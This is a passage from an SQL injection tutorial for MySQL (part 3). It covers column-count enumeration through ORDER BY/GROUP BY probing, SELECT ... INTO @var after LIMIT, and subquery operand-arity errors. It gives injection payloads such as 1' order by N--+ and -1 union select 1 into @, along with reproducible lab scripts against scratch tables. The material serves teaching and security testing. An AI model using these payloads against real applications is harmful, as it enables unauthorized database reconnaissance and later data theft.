SQL injection knowledge base: MySQL, part 3

Continued from SQL injection knowledge base: MySQL, part 2

Tables and columns

1. Finding the number of columns

ORDER BY / GROUP BY

group by / order by N, with N incremented by one on each request;

Notes:

ORDER BY sorts the result set and GROUP BY groups its rows; both accept a column position (1 = first column of the SELECT list), and MySQL rejects a position larger than the number of columns the query selects.

Keep increasing the number until you get an error response.

Although GROUP BY and ORDER BY are different features in SQL, they confirm the column count of the query in exactly the same way. The count they reveal is that of the SELECT list behind the injection point, not the number of columns in the table.

examples:

Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' order by 1--+   true

Reconstructed: select username,password,permission from users where id = '1' order by 1 --+

Fetches username, password and permission for id = 1 from users, then sorts by the first column (username) in ascending order. The --+ is a -- comment followed by a space (the + decodes to a space in a URL), which comments out the trailing quote.

1' order by 2--+   true

...

1' order by 4--+   false, so the query selects 3 columns

1' union select 1,2,3--+   true

Error-based, method 1

group by or order by 1,2,3,4,5 ......

Like the method above, but when error messages are displayed a single request is enough: list more positions than there can be columns, and the first position named in the error is the column count plus one.

examples:

select * from student where id = 1 order by 1,2,3 ;   true

select * from student where id = 1 order by 1,2,3,4 ;   true

select * from student where id = 1 order by 1,2,3,4,5 ;   returns   ERROR 1054 (42S22): Unknown column '5' in 'order clause'

so the query (select *, hence the table) has only 4 columns

select * from student where id = 1 group by 1,2,3,4,5 ;   returns   ERROR 1054 (42S22): Unknown column '5' in 'group statement'

so the query has only 4 columns
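A reproducible lab for the ORDER BY / GROUP BY probing in both subsections above, added here as an example; it is not code from the original page. It assumes a scratch MySQL database, and the student table layout and rows are invented. The vulnerable query deliberately selects three of the table's four columns, so the script shows which count the probe actually reveals.

```sql
-- Added example, not from the original page. Assumes a scratch MySQL schema;
-- the table layout and rows are invented for the demonstration.
DROP TABLE IF EXISTS student;
CREATE TABLE student (
  id    INT PRIMARY KEY,
  name  VARCHAR(32),
  id1   INT,
  grade INT
);
INSERT INTO student VALUES (1, 'alice', 10, 90), (2, 'bob', 11, 80);

-- Vulnerable template on the application side (value concatenated, quoted):
--   SELECT name, id1, grade FROM student WHERE id = '<input>'
-- Injected value:  1' ORDER BY N--+
-- The '+' decodes to a space in a URL; MySQL only treats '--' as a comment
-- when a space follows it, so the trailing quote ends up commented out.

-- Incremental probing: these are the statements the server actually runs.
-- Positions 1..3 succeed:
SELECT name, id1, grade FROM student WHERE id = '1' ORDER BY 1-- '
SELECT name, id1, grade FROM student WHERE id = '1' ORDER BY 2-- '
SELECT name, id1, grade FROM student WHERE id = '1' ORDER BY 3-- '
-- Position 4 raises ERROR 1054 (Unknown column '4' in 'order clause') even
-- though the table has four columns: ORDER BY counts the SELECT list.
SELECT name, id1, grade FROM student WHERE id = '1' ORDER BY 4-- '

-- Single-request variant (needs the error text to reach the attacker): list
-- more positions than plausible; the first one named in the error is count+1.
SELECT name, id1, grade FROM student WHERE id = '1' ORDER BY 1,2,3,4,5,6,7,8-- '

-- GROUP BY behaves identically, only the clause name in the error differs
-- ('group statement' instead of 'order clause').
SELECT name, id1, grade FROM student WHERE id = '1' GROUP BY 1,2,3,4,5-- '

-- Confirmation: a UNION of the same width is accepted, and the constants
-- 1,2,3 show which positions the application echoes back.
SELECT name, id1, grade FROM student WHERE id = '1' UNION SELECT 1,2,3-- '
```

Run the statements one at a time in the mysql client; the ones that succeed return rows, the ones that fail print the 1054 error quoted above.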

Error-based, method 2

select ... into @var1, @var2, @var3 ...

1. Works when error messages are displayed: MySQL requires exactly one variable per selected column and raises an error otherwise.

2. A practical way to find the column count when a LIMIT clause follows the injection point: a UNION cannot be appended after LIMIT, but INTO can. (A bare @ is a user variable with an empty name; named variables such as @a,@b work the same way and read more clearly.)

examples:

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 union select 1 into @,@,@   error: The used SELECT statements have a different number of columns

-1 union select 1 into @   no error, so the query selects one column

Examples:

mysql> select name from student where id = -1 union select 1 into @;    the query selects a single column (name), so select 1 into @ on the right side raises no error
Query OK, 1 row affected (0.00 sec)

mysql> select name,id1 from student where id = -1 union select 1,2 into @,@;    two columns here (name and id1), so the right side must be select 1,2 into @,@ to avoid the error
Query OK, 1 row affected (0.00 sec)

examples:

Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 into @,@,@    error: The used SELECT statements have a different number of columns

1 into @,@      no error, so the query selects 2 columns

Example:

select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)

LIMIT usage:

limit offset, count   (the offset is zero-based)
select name,id from student limit 0,1;   the first row of student
select name,id from student limit 1,1;   the second row of student
select name,id from student limit 0,3;   three rows, starting from the first
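The INTO probe for both injection-point shapes above (the UNION-style one after WHERE id = and the one that lands after LIMIT), together with the LIMIT arithmetic, in one reproducible MySQL script. This is an added example, not code from the original page; it assumes a scratch database, and the Users table, its rows and the variable names @a, @b, @c, @p, @q are invented.

```sql
-- Added example, not from the original page. Assumes a scratch MySQL schema;
-- the Users layout, its rows and the @variable names are invented.
DROP TABLE IF EXISTS Users;
CREATE TABLE Users (
  id         INT PRIMARY KEY,
  username   VARCHAR(32),
  permission VARCHAR(16)
);
INSERT INTO Users VALUES (1, 'admin', 'all'), (2, 'guest', 'read');

-- Vulnerable template: the page size is concatenated after LIMIT, so the
-- injection point is the very end of the statement:
--   SELECT username, permission FROM Users LIMIT 1,<input>
-- LIMIT offset,count is zero-based: LIMIT 1,1 is the second row only.

-- Why UNION is useless here: LIMIT before UNION is a syntax error
-- (ERROR 1221, Incorrect usage of UNION and LIMIT), so the usual
-- "UNION SELECT 1,2,..." probe never reaches the column-count check.
SELECT username, permission FROM Users LIMIT 1,1 UNION SELECT 1,2;

-- INTO is still allowed after LIMIT, and MySQL insists on exactly one
-- variable per selected column. Too few or too many raises ERROR 1222
-- (The used SELECT statements have a different number of columns); the
-- variable count that goes through is the column count.
SELECT username, permission FROM Users LIMIT 1,1 INTO @a;         -- 1 var: error 1222
SELECT username, permission FROM Users LIMIT 1,1 INTO @a, @b, @c; -- 3 vars: error 1222
SELECT username, permission FROM Users LIMIT 1,1 INTO @a, @b;     -- 2 vars: accepted

-- Side effect worth knowing: the accepted probe also copied the second row
-- into session variables, readable by any later statement on the same
-- connection (with connection pooling that may be a different request).
SELECT @a, @b;

-- Same check for the WHERE-style injection point from the earlier example:
--   SELECT permission FROM Users WHERE id = <input>
-- INTO applies to the whole union, so its variable count must equal the
-- union's width; here one variable is accepted and two are rejected.
SELECT permission FROM Users WHERE id = -1 UNION SELECT 1 INTO @p;
SELECT permission FROM Users WHERE id = -1 UNION SELECT 1 INTO @p, @q;
```

The INTO form is the one to reach for whenever the injected text has to be the last token of the statement; ORDER BY N also works after LIMIT only when the application's own LIMIT is absent, because ORDER BY must precede LIMIT.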
 

Error-based, method 3

 AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

Notes:

Works when you know a table name and error messages are displayed: MySQL refuses to compare the multi-column subquery with a single value and names the subquery's column count in the error. That number is the column count of the named table, not the number of columns selected by the injected query.

example:

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

1 and (select * from student) = 1

Example:
select name,id from student where id = 1 and (select * from student) = 1;

ERROR 1241 (21000): Operand should contain 4 column(s)


select name,id from student where id = 1 and (select * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column(s)

The query itself selects only two columns (name, id); the error reports the four columns of student. The value on the right does not matter, because the error is raised on operand arity before any comparison takes place.
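A reproducible MySQL lab for the subquery-comparison probe above, added as an example (not code from the original page). It assumes a scratch database and invents the student table, which has four columns while the vulnerable query selects two, so the script shows which of the two counts the error reveals and how to confirm it with a row constructor.

```sql
-- Added example, not from the original page. Assumes a scratch MySQL schema;
-- the student layout and rows are invented.
DROP TABLE IF EXISTS student;
CREATE TABLE student (
  id    INT PRIMARY KEY,
  name  VARCHAR(32),
  id1   INT,
  grade INT
);
INSERT INTO student VALUES (1, 'alice', 10, 90), (2, 'bob', 11, 80);

-- Vulnerable template: SELECT name, id FROM student WHERE id = <input>
-- Injected value:      1 AND (SELECT * FROM student) = 1

-- The comparison is never evaluated: MySQL checks operand arity first and
-- reports the subquery's width. That width is the TABLE's column count (4),
-- not the injected query's (2), so this probe answers a different question
-- than the ORDER BY probe does, and it needs the error text to be visible.
SELECT name, id FROM student WHERE id = 1 AND (SELECT * FROM student) = 1;
-- ERROR 1241 (21000): Operand should contain 4 column(s)

-- The right-hand value is irrelevant; only its arity matters.
SELECT name, id FROM student WHERE id = 1 AND (SELECT * FROM student) = 'x';

-- Confirming the count: a row constructor of the reported width passes the
-- arity check, so the statement runs and (with these rows) returns nothing.
-- LIMIT 1 avoids ERROR 1242 (Subquery returns more than 1 row).
SELECT name, id FROM student WHERE id = 1 AND (SELECT * FROM student LIMIT 1) = (1,2,3,4);
-- A three-element constructor is rejected with the same 1241 error. If the
-- application distinguishes a failed query from an empty result, that
-- error/no-error difference leaks the width even when the message is hidden.
SELECT name, id FROM student WHERE id = 1 AND (SELECT * FROM student LIMIT 1) = (1,2,3);

-- Ground truth for the lab, to verify what the error revealed (this needs
-- a direct connection, not the injection point).
SELECT COUNT(*) FROM information_schema.columns
 WHERE table_schema = DATABASE() AND table_name = 'student';
```

Once the table width is known, the matching-width row constructor is also the starting point for comparing real row contents, but that is a data-extraction step rather than a column-count one.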